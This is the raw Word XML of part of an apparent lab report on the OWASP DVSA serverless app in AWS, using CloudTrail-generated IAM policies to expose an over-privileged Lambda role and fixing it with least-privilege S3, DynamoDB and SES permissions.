      </w:r>
      <w:r w:rsidR="006C423C">
        <w:t xml:space="preserve">scan </w:t>
      </w:r>
      <w:r>
        <w:t>attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404200A6" w14:textId="35F3F444" w:rsidR="00BF573E" w:rsidRDefault="00BF573E" w:rsidP="00081012">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5376F0E6" w14:textId="40194FFB" w:rsidR="00081012" w:rsidRDefault="00081012" w:rsidP="00081012">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52508E85" w14:textId="0031FE6A" w:rsidR="00081012" w:rsidRDefault="00081012" w:rsidP="00081012">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Running the command</w:t>
      </w:r>
      <w:r w:rsidR="002762F0">
        <w:t xml:space="preserve"> shows the contents of the DB</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE873A2" w14:textId="7E47E2C4" w:rsidR="00081012" w:rsidRPr="00F24B84" w:rsidRDefault="006C423C" w:rsidP="00081012">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006C423C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D37117" wp14:editId="24A4B7AC">
            <wp:extent cx="5943600" cy="5043805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="17266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56077" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5043805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59957D92" w14:textId="61083EFD" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84"/>
    <w:p w14:paraId="56FF2D51" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6: Trigger the Lambda Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167A701E" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:r w:rsidRPr="00F24B84">
        <w:t>To generate real CloudTrail activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BF3C1" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Return to the DVSA application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B33308C" w14:textId="70E5CB53" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Perform the relevant workflow that triggers the receipt email (place an order </w:t>
      </w:r>
      <w:r w:rsidR="004D2458">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">complete a transaction). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DA2109" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Confirm Lambda execution: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C321642" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS Lambda → Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588CC076" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Open: DVSA-SEND-RECEIPT-EMAIL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC04AA8" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> tab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCD611" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CloudWatch Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD0525" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Verify that a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>new invocation log entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> has been created </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DFD940" w14:textId="724A253E" w:rsidR="007C1646" w:rsidRPr="00F24B84" w:rsidRDefault="007C1646" w:rsidP="007C1646">
      <w:r w:rsidRPr="007C1646">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21839E6E" wp14:editId="606927C8">
            <wp:extent cx="5943600" cy="3333115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="185941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2958" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3333115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB3469" w14:textId="146553CB" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84"/>
    <w:p w14:paraId="0F02205D" w14:textId="0C54DBD1" w:rsidR="0074238B" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="0074238B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7: Generate Policy from Observed Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CFC23" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS IAM → Roles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1B5F1" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t>Open the execution role:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:br/>
        <w:t xml:space="preserve">serverlessrepo-OWASP-DVSA-SendReceiptFunctionRole-... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D8F42" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Select the option </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generate policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> (or access it from the role actions menu). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD8D00" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Configure the following: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207116A" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time period:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> Last 1 day </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433F63B" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Region:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> us-east-1 (N. Virginia) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A36C3" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trail:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> dvsa-policygen-trail </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53939E19" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generate policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124F4F4" w14:textId="0E4C4B18" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84"/>
    <w:p w14:paraId="61D6269B" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8: Review Observed (Actually Used) Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93ECB6" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:r w:rsidRPr="00F24B84">
        <w:t>On the generated policy review page, AWS lists the permissions detected from CloudTrail based on actual function execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ECEB3F" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:r w:rsidRPr="00F24B84">
        <w:t>After triggering the receipt workflow, the observed permissions were:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FE2C3B" w14:textId="77777777" w:rsidR="006828C6" w:rsidRDefault="00F24B84" w:rsidP="006828C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CloudWatch Logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> CreateLogStream </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B62CE" w14:textId="16273A8F" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="006828C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006828C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS KMS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> Decrypt </w:t>
      </w:r>
      <w:r w:rsidR="006828C6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006828C6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006828C6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006828C6">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA42A4" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS STS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> GetCallerIdentity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB6433" w14:textId="1FE9A1FA" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84"/>
    <w:p w14:paraId="4FCFAB1A" w14:textId="63B5842A" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9: Interpretation of Results</w:t>
      </w:r>
      <w:r w:rsidR="00174765" w:rsidRPr="00174765">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="459C3D70" wp14:editId="03084EC7">
            <wp:extent cx="5943600" cy="3143885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197572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28105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3143885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3F596" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">The generated policy shows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real runtime behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> of the Lambda function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005176FA" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:r w:rsidRPr="00F24B84">
        <w:t>This reveals that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E157C" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">The function uses only a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>small subset of permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> in practice. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B0685" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">Many attached IAM permissions (e.g., S3 full access, DynamoDB full access, SES full access) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not observed in actual execution traces</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5607AF" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This confirms a clear </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>over-privilege gap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> between: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71CFF2" w14:textId="77777777" w:rsidR="00F24B84" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="00F24B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Declared permissions (IAM policy)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24B84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48F115" w14:textId="170C2590" w:rsidR="005445D3" w:rsidRPr="00F24B84" w:rsidRDefault="00F24B84" w:rsidP="005445D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Actual used permissions (CloudTrail logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723ED1E9" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="186C8E8D" w14:textId="177CB8A9" w:rsidR="001D3ABE" w:rsidRDefault="005445D3" w:rsidP="005445D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 6) Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533915F3" w14:textId="191679C1" w:rsidR="005C25CF" w:rsidRDefault="005C25CF" w:rsidP="00E14026">
      <w:r>
        <w:t xml:space="preserve">The fix simply belong to the IAM service where we should reduce the given roles to the function to as minimum as possible achieving the </w:t>
      </w:r>
      <w:r w:rsidR="00E14026" w:rsidRPr="00E14026">
        <w:t>least-privilege policies</w:t>
      </w:r>
      <w:r w:rsidR="00E14026">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00442D1A">
        <w:t xml:space="preserve"> By reducing the privileges, attacker could no longer abuse them beyond the intended purpose of function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB69A7" w14:textId="77777777" w:rsidR="005E3FAC" w:rsidRDefault="005E3FAC" w:rsidP="00E14026"/>
    <w:p w14:paraId="40449F0F" w14:textId="5F42108C" w:rsidR="00BF4139" w:rsidRDefault="005E3FAC" w:rsidP="005E3FAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="0"/>
      <w:r w:rsidRPr="00941777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 7) Code / Config Changes</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7017D504" w14:textId="36F32C90" w:rsidR="00474469" w:rsidRDefault="00474469" w:rsidP="005E3FAC">
      <w:r>
        <w:t>Restricted the previliges of S3 and DynomoDB so that it cannot be exploited beyond its intended functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1E560" w14:textId="7C907242" w:rsidR="00474469" w:rsidRDefault="00C0661C" w:rsidP="005E3FAC">
      <w:r w:rsidRPr="00C0661C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7C4137" wp14:editId="67449583">
            <wp:extent cx="5943600" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="210817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78553" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1231900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD46DCB" w14:textId="0022ACD9" w:rsidR="00C0661C" w:rsidRDefault="00C0661C" w:rsidP="005E3FAC">
      <w:r w:rsidRPr="00C0661C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4DB787" wp14:editId="3DD429FF">
            <wp:extent cx="5943600" cy="1136015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="3393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87760" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1136015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD657B" w14:textId="7D7832FB" w:rsidR="00A0101B" w:rsidRDefault="00A0101B" w:rsidP="005E3FAC">
      <w:r>
        <w:t xml:space="preserve">Also, removed the </w:t>
      </w:r>
      <w:r w:rsidR="007D58B6">
        <w:t>AmzonSESFullAccess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that grants every email service and replaced it with send email service only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA1748" w14:textId="322547CD" w:rsidR="00A0101B" w:rsidRPr="00474469" w:rsidRDefault="003C6D74" w:rsidP="005E3FAC">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6D74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B40579E" wp14:editId="5A7D3B2D">
            <wp:extent cx="5943600" cy="1387475"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1181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0153" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1387475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
